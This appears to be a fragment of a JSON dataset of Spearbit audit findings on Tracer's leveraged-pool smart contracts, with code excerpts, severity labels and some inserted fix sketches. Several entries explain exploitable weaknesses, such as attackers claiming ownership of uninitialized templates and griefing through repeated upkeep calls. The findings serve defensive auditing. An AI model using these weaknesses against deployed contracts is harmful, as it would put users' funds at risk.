contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only be called from InvariantCheck paused = true; emit Paused(); } } contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only be called from InvariantCheck paused = true; emit Paused(); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "The value of lastExecutionPrice fails to update if pool.poolUpkeep() reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The performUpkeepSinglePool() function of the PoolKeeper contract updates executionPrice[] with the latest price and calls pool.poolUpkeep() to process the price difference. However, pool.poolUpkeep() can revert, for example due to the checkInvariantsBeforeFunction modifier in mintTokens(). If pool.poolUpkeep() reverts then the previous price value is lost and the processing will not be accurate. Therefore, it is safer to store the new price only if pool.poolUpkeep() has been executed successfully. function performUpkeepSinglePool(...) public override { ... int256 lastExecutionPrice = executionPrice[_pool]; executionPrice[_pool] = latestPrice; ... try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) { // previous price can get lost if poolUpkeep() reverts ... // executionPrice[_pool] should be updated here } catch Error(string memory reason) { ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Pools can be deployed with malicious or incorrect quote tokens and oracles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployment of a pool via deployPool() is permissionless. The deployer provides several parameters that have to be trusted by the users of a specific pool; these parameters include: oracleWrapper, settlementEthOracle, quoteToken and invariantCheck. If any one of them is malicious, then the pool and its value will be affected.
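For the paused-state finding above, one possible shape of a fix is sketched below: let the modifier skip execution without reverting when the invariant check has just paused the pool, so the paused = true write is not rolled back. This is a sketch under that assumption, not the team's chosen remediation; silently returning has its own trade-offs (the call "succeeds" without doing anything), and an alternative is to pause in a separate transaction.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IInvariantCheck {
        function checkInvariants(address pool) external;
    }

    // Sketch: preserve the pause set by checkInvariants() instead of reverting it away.
    contract PausableSketch {
        bool public paused;
        IInvariantCheck public invariantCheck;

        modifier checkInvariantsBeforeFunction() {
            invariantCheck.checkInvariants(address(this)); // may set paused = true via pause()
            if (!paused) {
                _; // run the function body only while the pool is live
            }
            // when paused, return WITHOUT reverting so paused = true persists
        }

        function pause() external {
            // access control (onlyInvariantCheckContract) omitted in this sketch
            paused = true;
        }
    }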
Note: Separate findings are made for the deployer check (issue Authenticity check for oracles is not effective) and the invariantCheck (issue Two different invariantCheck variables used in PoolFactory.deployPool()).", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "pairTokenBase and poolBase template contract instances are not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The constructor of the PoolFactory contract creates three template contract instances but only one is initialized: poolCommitterBase. The other two contract instances (pairTokenBase and poolBase) are not initialized. contract PoolFactory is IPoolFactory, Ownable { constructor(address _feeReceiver) { ... PoolToken pairTokenBase = new PoolToken(DEFAULT_NUM_DECIMALS); // not initialized pairTokenBaseAddress = address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates, setting himself as the owner, and perform owner actions on these contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Oracles are not updated before use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement / ETH prices. As it currently is, the code could operate on old data.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "getPendingCommits() underreports commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit().
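For the uninitialized-template finding above, a common mitigation is to lock the templates at construction time. A minimal sketch, assuming an OpenZeppelin-style Initializable (>= 4.6, which provides _disableInitializers()); with other Initializable implementations, calling initialize() with dummy values from the factory constructor achieves the same effect.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/proxy/utils/Initializable.sol";

    // Sketch: lock a template instance so no one can claim ownership of it.
    contract LockedTemplate is Initializable {
        address public owner;

        constructor() {
            _disableInitializers(); // the template itself can never be initialized
        }

        function initialize(address _owner) external initializer {
            owner = _owner; // only reachable on clones, never on the template
        }
    }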
The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIntervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits, which leads to the checkInvariants function not checking the correct values.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Authenticity check for oracles is not effective", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender. Note: this check does protect against frontrunning the deployment transaction of the same pool. See Undocumented frontrunning protection. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, \"Deployer must be oracle wrapper owner\");", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Incorrect calculation of keeper reward", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper. The tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is the note at PoolKeeper.sol#L244, which states that the tip percent is in WAD units, while it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case, as it is denominated in the quote token at WAD precision.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments() the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way. A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0. Note: Also see issue It is not possible to call executeCommitments() for multiple old commits. It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert. function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override onlyPool { ... uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max; ... while (i < upperBound) { if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) { // lastPriceTimestamp shouldn't be updated too soon ... } } ...
updateMintingFee(); // should do this once (in combination with _boundedIntervals==true) ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "It is not possible to call executeCommitments() for multiple old commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs: In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp. In the next run of poolUpkeep(), processing will stop at require(intervalPassed(), ...), because block.timestamp hasn't increased. This means the rest of the commitments won't be executed by executeCommitments(), and updateIntervalId, which is updated in executeCommitments(), will start lagging. function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); // next time lastPriceTimestamp == block.timestamp executePriceChange(_oldPrice, _newPrice); // should only do this once (in combination with _boundedIntervals==true) IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are processed } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Medium Risk" + ] + }, + { + "title": "Incorrect comparison in getUpdatedAggregateBalance()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When the value of data.updateIntervalId accidentally happens to be larger than data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldn't happen. Although this is unlikely, it is also very easy to prevent. function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) { if (data.updateIntervalId == data.currentUpdateIntervalId) { // Update interval has not passed: No change return (0, 0, 0, 0, 0); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "updateAggregateBalance() can run out of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... uint256[] memory currentIntervalIds = unAggregatedCommitments[user]; uint256 unAggregatedLength = currentIntervalIds.length; for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; ...
UserCommitment memory commitment = userCommitments[user][id]; ... if (commitment.updateIntervalId < updateIntervalId) { ... } else { ... storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays in array } } delete unAggregatedCommitments[user]; unAggregatedCommitments[user] = storageArrayPlaceHolder; ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Pool information might be lost if setFactory() of PoolKeeper contract is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesn't know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail. function setFactory(address _factory) external override onlyOwner { factory = IPoolFactory(_factory); ... } function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) { if (!factory.isValidPool(_pool)) { // might not work if factory is changed return false; } ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Ether could be lost when calling commit()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false then the ETH stays in the PoolCommitter contract and is effectively lost. Note: This was also documented in Secureum's CARE report. function commit(...) external payable override checkInvariantsAfterFunction { ... if (payForClaim) { autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender); } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Race condition if PoolFactory deploys pools before fees are set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool() function of the PoolFactory contract can deploy pools before the changeInterval value and the minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values aren't clear. In some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesn't check the value of changeInterval. The setBurningFee(), setMintingFee() and setChangeInterval() functions of the PoolCommitter contract don't check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION. contract PoolFactory is IPoolFactory, Ownable { function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee,...) ... { ... require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); mintingFee = _mintingFee; burningFee = _burningFee; changeInterval = _changeInterval; ...
} function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... // no check that mintingFee, burningFee, changeInterval are set poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...); } } contract PoolCommitter is IPoolCommitter, Initializable { function initialize(..., uint256 _mintingFee, uint256 _burningFee, ...) ... { ... require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); ... // no check on _changeInterval mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); ... } function setBurningFee(uint256 _burningFee) external override onlyGov { burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee ... } function setMintingFee(uint256 _mintingFee) external override onlyGov { mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee ... } function setChangeInterval(uint256 _changeInterval) external override onlyGov { changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on _changeInterval ... } function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private { ... if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) { // mintingFee is greater than 1 (100%). // We want to cap this at a theoretical max of 100% mintingFee = MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18 } } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Low Risk" + ] + }, + { + "title": "Committer not validated on withdraw claim and multi-paid claim", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "AutoClaim checks that the committer creating the claim request in makePaidClaimRequest and withdrawing the claim request in withdrawUserClaimRequest is a valid committer for the PoolFactory used in the AutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter.
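A minimal sketch of the missing check, reusing the same PoolFactory lookup (poolFactory.isValidPoolCommitter) that makePaidClaimRequest() already relies on; the exact multi-claim signature shown is an assumption for illustration, not the contract's actual declaration.

    // Sketch: validate any caller-supplied committer against the trusted factory.
    modifier onlyValidCommitter(address poolCommitterAddress) {
        require(
            poolFactory.isValidPoolCommitter(poolCommitterAddress),
            "Invalid PoolCommitter"
        );
        _;
    }

    // Hypothetical application to one of the multi-claim entry points:
    function multiPaidClaimSinglePoolCommitter(address[] calldata users, address poolCommitter)
        external
        onlyValidCommitter(poolCommitter) // added validation
    {
        // ... existing claim loop ...
    }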
unchecked { counter += 1; } i++; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "transferOwnership() function is inaccessible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory. However, PoolFactory doesn't call the function, so it is essentially dead code that adds unnecessary gas cost to deployment. function transferOwnership(address _owner) external onlyOwner { require(_owner != address(0), \"Owner: setting to 0 address\"); owner = _owner; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use cached values when present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The updateAggregateBalance() function creates a temporary variable id with the value currentIntervalIds[i]. Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to save gas. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { // could use id continue; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "_invariantCheckContract stored twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, both in invariantCheckContract and invariantCheck. This is not necessary and costs extra gas. contract PoolCommitter is IPoolCommitter, Initializable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize( ..., address _invariantCheckContract, ... ) external override initializer { ... invariantCheckContract = _invariantCheckContract; invariantCheck = IInvariantCheck(_invariantCheckContract); ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ... invariantCheckContract = initialization._invariantCheckContract; invariantCheck = IInvariantCheck(initialization._invariantCheckContract); } }
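A minimal sketch of the single-slot alternative: store only the typed reference and derive the address on demand, keeping an explicit view function so the old public getter's ABI is preserved. The stripped-down contract is an illustration, not the project's code.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IInvariantCheck {
        function checkInvariants(address pool) external;
    }

    contract SingleSlotSketch {
        IInvariantCheck public invariantCheck; // the only stored copy

        function initialize(address _invariantCheckContract) external {
            // (initializer guard omitted in this sketch)
            invariantCheck = IInvariantCheck(_invariantCheckContract);
        }

        // keeps the invariantCheckContract() getter without a second storage slot
        function invariantCheckContract() external view returns (address) {
            return address(invariantCheck);
        }
    }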
function mintTokens(bool isLongToken,...){ if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); } else { IPoolToken(tokens[SHORT_INDEX]).mint(...); ...", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Uncached array length used in loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The users array length is used in a for loop condition, therefore the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas. for (uint256 i; i < users.length; i++) { ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary deletion of array elements in a loop is expensive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBalance. Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Zero-value transfers are allowed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Given that claim() can return 0 when the claim isn't valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0. Address.sendValue( payable(msg.sender), claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId) );", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unneeded onlyUnpaused modifier in setQuoteAndPool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call, the contract is always unpaused, therefore the onlyUnpaused modifier is not necessary.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary mapping access in AutoClaim.makePaidClaimRequest()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Resolving mappings consumes more gas than directly accessing the storage struct, therefore it's more gas-efficient to use the already de-referenced variable than to resolve the mapping again. function makePaidClaimRequest(address user) external payable override onlyPoolCommitter { ClaimRequest storage request = claimRequests[user][msg.sender]; ... uint256 reward = claimRequests[user][msg.sender].reward; ... claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; claimRequests[user][msg.sender].reward = msg.value;", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Function complexity can be reduced from linear to constant by rewriting loops", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average.
Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly allow an increased buffer size. contract PriceObserver is Ownable, IPriceObserver { ... * @dev If the backing array is full (i.e., `length() == capacity()`, then * it is rotated such that the oldest price observation is deleted function add(int256 x) external override onlyWriter returns (bool) { ... if (full()) { leftRotateWithPad(x); ... } function leftRotateWithPad(int256 x) private { uint256 n = length(); /* linear scan over the [1, n] subsequence */ for (uint256 i = 1; i < n; i++) { observations[i - 1] = observations[i]; } ... } contract SMAOracle is IOracleWrapper { * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs` ... function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... /* linear scan over the [n - k, n] subsequence */ for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unused observer state variable in PoolKeeper", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There is no use for the observer state variable. It is only used in performUpkeepSinglePool in a require statement to check if it is set. address public observer; function setPriceObserver(address _observer) external onlyOwner { ... observer = _observer; ... function performUpkeepSinglePool(...) require(observer != address(0), \"Observer not initialized\"); ...", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Events and event emissions can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Having a single DeployCommitter event emitted after setQuoteAndPool() in PoolFactory.deployPool() would result in: 1. Better UX/event tracking and alignment with the current behavior of emitting events during the factory deployment. 2. Removing the QuoteAndPoolChanged event, which is emitted only once during the lifetime of the PoolCommitter, during PoolFactory.deployPool(). 3. Removing the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed, it was initialized; this can be tracked by the DeployCommitter event.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Multi-paid claim rewards should be sent only if nonzero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter(), there could be cases where the reward sent back to the claimer is zero.
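For the PriceObserver/SMA complexity finding above, a minimal ring-buffer sketch, assuming the fixed capacity of 24 from the original array; instead of rotating the array on every add(), the oldest slot is overwritten, and a running sum makes the average O(1). A windowed SMA over only the last k observations would need additional bookkeeping, so this sketch covers the whole-buffer case.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract RingBufferSketch {
        int256[24] private observations;
        uint256 private count;      // stored observations, capped at 24
        uint256 private head;       // index of the oldest observation
        int256 private runningSum;  // enables an O(1) average over the buffer

        function add(int256 x) external {
            if (count == observations.length) {
                // overwrite the oldest element instead of shifting the array
                runningSum -= observations[head];
                observations[head] = x;
                head = (head + 1) % observations.length;
            } else {
                observations[(head + count) % observations.length] = x;
                count++;
            }
            runningSum += x;
        }

        function sma() external view returns (int256) {
            require(count > 0, "empty buffer");
            return runningSum / int256(count);
        }
    }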
In these scenarios, the reward value should be checked to avoid wasting gas.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Unnecessary quad arithmetic use where integer arithmetic works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The ABDKMathQuad library is used to compute a division which is then truncated with toUint(). Semantically this is equivalent to a standard uint division, which is more gas efficient. The same library is also unnecessarily used to compute the keeper's reward. This can be safely done by using standard uint computation. function appropriateUpdateIntervalId(...) ... uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval)); function keeperReward(...) ... int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT ) ) ); uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals(); uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals);", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Gas Optimization" + ] + }, + { + "title": "Custom errors should be used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas efficient. AutoClaim.sol: require(poolFactory.isValidPoolCommitter(msg.sender), \"msg.sender not valid PoolCommitter\"); AutoClaim.sol: require(_poolFactoryAddress != address(0), \"PoolFactory address == 0\"); AutoClaim.sol: require(poolFactory.isValidPoolCommitter(poolCommitterAddress), \"Invalid PoolCommitter\"); AutoClaim.sol: require(users.length == poolCommitterAddresses.length, \"Supplied arrays must be same length\"); ChainlinkOracleWrapper.sol: require(_oracle != address(0), \"Oracle cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_deployer != address(0), \"Deployer cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_decimals <= MAX_DECIMALS, \"COA: too many decimals\"); ChainlinkOracleWrapper.sol: require(answeredInRound >= roundID, \"COA: Stale answer\"); ChainlinkOracleWrapper.sol: require(timeStamp != 0, \"COA: Round incomplete\"); ERC20_Cloneable.sol: require(msg.sender == owner, \"msg.sender not owner\"); ERC20_Cloneable.sol: require(_owner != address(0), \"Owner: setting to 0 address\"); InvariantCheck.sol: require(_factory != address(0), \"Factory address cannot be null\"); InvariantCheck.sol: require(poolFactory.isValidPool(poolToCheck), \"Pool is invalid\"); LeveragedPool.sol: require(!paused, \"Pool is paused\"); (multiple occurrences) LeveragedPool.sol: require(msg.sender == keeper, \"msg.sender not keeper\"); LeveragedPool.sol: require(msg.sender == invariantCheckContract, \"msg.sender not invariantCheckContract\"); LeveragedPool.sol: require(msg.sender == poolCommitter, \"msg.sender not poolCommitter\"); LeveragedPool.sol: require(msg.sender == governance, \"msg.sender not governance\"); LeveragedPool.sol: require(initialization._feeAddress != address(0), \"Fee address cannot be 0 address\"); LeveragedPool.sol: require(initialization._quoteToken != address(0), \"Quote token cannot be 0 address\"); LeveragedPool.sol: require(initialization._oracleWrapper != address(0), \"Oracle wrapper cannot be 0 address\"); LeveragedPool.sol: require(initialization._settlementEthOracle != address(0), \"Keeper oracle cannot be 0 address\"); LeveragedPool.sol: require(initialization._owner != address(0), \"Owner cannot be 0 address\"); LeveragedPool.sol: 